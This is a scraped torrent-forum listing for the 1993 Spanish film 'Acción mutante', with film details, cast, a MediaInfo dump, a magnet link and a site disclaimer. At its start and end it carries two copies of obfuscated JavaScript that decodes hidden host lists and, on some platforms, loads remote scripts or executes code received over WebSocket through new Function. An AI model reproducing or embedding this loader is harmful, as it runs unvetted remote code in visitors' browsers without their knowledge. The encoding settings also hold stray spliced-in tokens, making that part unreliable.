铁面战警[简繁字幕].Action.Mutante.1993.1080p.BluRay.DD5.1.x265.10bit.MNHD-bt9527.cc 5.58GB

版主小s 15天前 147

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 铁面战警 / Action mutante / Mutant Action

◎片 名 Acción mutante

◎年 代 1993

◎产 地 西班牙 / 法国

◎类 别 喜剧 / 科幻 / 惊悚 / 犯罪

◎语 言 西班牙语

◎上映日期 1993-02-03

◎IMDb链接 https://www.imdb.com/title/tt0106215/

◎豆瓣评分 6.5/10 (56人评价)

◎豆瓣链接 https://movie.douban.com/subject/2067537/

◎片 长 90 分钟

◎导 演 艾利克斯·德·拉·伊格莱希亚 álex de la Iglesia (id:1036806)

◎编 剧 艾利克斯·德·拉·伊格莱希亚 álex de la Iglesia (id:1036806)

豪尔赫·格力加耶切瓦利亚 Jorge Guerricaechevarría (id:1285615)

◎演 员 埃丝特·加西亚 Esther García (id:1284528)

弗朗西斯科·梅斯特 Francisco Maestre (id:1290710)

恩里克·圣弗兰西斯科 Enrique San Francisco (id:1146700)

圣地亚哥·塞古拉 Santiago Segura (id:1010740)

安东尼奥·雷西内斯 Antonio Resines (id:1025408)

卡拉·埃莱哈尔德 Karra Elejalde (id:1028308)

费奥多尔·阿特金 Féodor Atkine (id:1031196)

萝西·德·帕尔马 Rossy de Palma (id:1050220)

比维安·费尔南德斯 Bibiana Fernández (id:1059033)

Arturo Arribas Arturo Arribas (id:1059272)

杰米·布兰奇 Jaime Blanch (id:1062817)

Saturnino García Saturnino García (id:1098811)

费尔南多·古林 Fernando Guillén (id:1100575)

Ion Gabella Ion Gabella (id:1101305)

Pololo Pololo (id:1130556)

亚历克斯·安克吕罗 álex Angulo (id:1000798)

佩德罗·阿莫多瓦 Pedro Almodóvar (id:1056071)

埃丝特·加西亚 Esther García (id:1284528)

阿古斯丁·阿莫多瓦 Agustín Almodóvar (id:1277067)

Carles Gusi Carles Gusi (id:1285656)

巴勃罗·布兰科 Pablo Blanco (id:1278760)

何塞·路易斯·阿里扎巴拉加 José Luis Arrizabalaga (id:1035705)

比阿弗拉 Biaffra (id:1049015)

莉娜·摩苏姆 Lena Mossum (id:1292641)

Estíbaliz Markiegi Estíbaliz Markiegi (id:1291016)

Pau Costa Pau Costa (id:1068688)

Poli Cantero Poli Cantero (id:1280012)

Susana Sánchez Susana Sánchez (id:1298793)

Paca Almenara Paca Almenara (id:1277062)

豪尔赫·格力加耶切瓦利亚 Jorge Guerricaechevarría (id:1285615)

Emilio Ruiz del Río Emilio Ruiz del Río (id:1003672)

Carlos J. Santos Carlos J. Santos (id:1296673)

◎标 签 西班牙 / 科幻 / 犯罪 / álexDeLaIglesia / 西班牙电影 / 1990s / cult / 喜剧

◎简 介

In a future world ruled by good-looking people, a terrorist group of mutants led by Ramon Yarritu kidnap the daughter of Orujo, a rich businessman, to claim for the rights of the ugly people. Escaping from the police in their spaceship, Ramon try to kill his gang in order to get all the ransom. The trip ends abruptly when they crash in Axturiax, the planet of the crazy miners w...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 296850673386005294342631298444464089894 (0xDF535C2EC3969BFAD6D57AD6A9E1EB26)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.58 GiB

  8. Duration : 1 h 33 min

  9. Overall bit rate : 8 551 kb/s

  10. Movie name : [email protected]DDQ.COM

  11. Encoded date : UTC 2021-11-15 14:21:19

  12. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  13. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 33 min

  21. Bit rate : 7 887 kb/s

  22. Width : 1 920 pixels

  23. Height : 776 pixels

  24. Display aspect ratio : 2.474

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.221

  31. Stream size : 5.15 GiB (92%)

  32. Writing library : x265 3.5+1-f0c1022b6:[Linux][GCC 9.3.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=11 / wpp / pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x776 / interlace=0 / total-frames=134614 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=250 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=80 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-merge=5 / limit-refs=0 / no-limit-modes / me=3 / subme=7 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=4 / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=1.50 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=22.4 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=1 / aq-strength=1.00 / no-cutree / zone-count=0 / no-strict-cbr / qg-size=8 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No

  36. Color range : Limited

  37. Color primaries : BT.709

  38. Transfer characteristics : BT.709

  39. Matrix coefficients : BT.709


  40. Audio

  41. ID : 2

  42. Format : AC-3

  43. Format/Info : Audio Coding 3

  44. Commercial name : Dolby Digital

  45. Codec ID : A_AC3

  46. Duration : 1 h 33 min

  47. Bit rate mode : Constant

  48. Bit rate : 640 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : L R C LFE Ls Rs

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 31.250 FPS (1536 SPF)

  53. Compression mode : Lossy

  54. Stream size : 428 MiB (7%)

  55. Title : Spanish

  56. Language : Spanish

  57. Service kind : Complete Main

  58. Default : Yes

  59. Forced : No


  60. Text #1

  61. ID : 3

  62. Format : UTF-8

  63. Codec ID : S_TEXT/UTF8

  64. Codec ID/Info : UTF-8 Plain Text

  65. Duration : 1 h 29 min

  66. Bit rate : 48 b/s

  67. Count of elements : 1084

  68. Stream size : 31.5 KiB (0%)

  69. Title : Chinese (Simplified)

  70. Language : Chinese

  71. Default : No

  72. Forced : No


  73. Text #2

  74. ID : 4

  75. Format : UTF-8

  76. Codec ID : S_TEXT/UTF8

  77. Codec ID/Info : UTF-8 Plain Text

  78. Duration : 1 h 29 min

  79. Bit rate : 48 b/s

  80. Count of elements : 1084

  81. Stream size : 31.5 KiB (0%)

  82. Title : Chinese (Traditional)

  83. Language : Chinese

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 5

  88. Format : UTF-8

  89. Codec ID : S_TEXT/UTF8

  90. Codec ID/Info : UTF-8 Plain Text

  91. Duration : 1 h 33 min

  92. Bit rate : 53 b/s

  93. Count of elements : 1117

  94. Stream size : 36.7 KiB (0%)

  95. Title : English

  96. Language : English

  97. Default : No

  98. Forced : No


  99. Text #4

  100. ID : 6

  101. Format : PGS

  102. Muxing mode : zlib

  103. Codec ID : S_HDMV/PGS

  104. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  105. Duration : 1 h 33 min

  106. Bit rate : 41.1 kb/s

  107. Count of elements : 2234

  108. Stream size : 27.4 MiB (0%)

  109. Title : English

  110. Language : English

  111. Default : No

  112. Forced : No


  113. Text #5

  114. ID : 7

  115. Format : PGS

  116. Muxing mode : zlib

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 29 min

  120. Bit rate : 34.1 kb/s

  121. Count of elements : 2196

  122. Stream size : 21.8 MiB (0%)

  123. Title : French

  124. Language : French

  125. Default : No

  126. Forced : No


  127. Menu

  128. 00:00:00.000 : en:Chapter 01

  129. 00:09:28.250 : en:Chapter 02

  130. 00:23:52.542 : en:Chapter 03

  131. 00:36:18.208 : en:Chapter 04

  132. 00:44:33.958 : en:Chapter 05

  133. 00:56:12.667 : en:Chapter 06

  134. 01:06:58.833 : en:Chapter 07

  135. 01:18:55.000 : en:Chapter 08




复制代码


TAGS 惊悚 犯罪 科幻 喜剧

磁力链:
  • magnet:?xt=urn:btih:363A796D16DEFC53728AA04C8D67809DF5C16D23

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};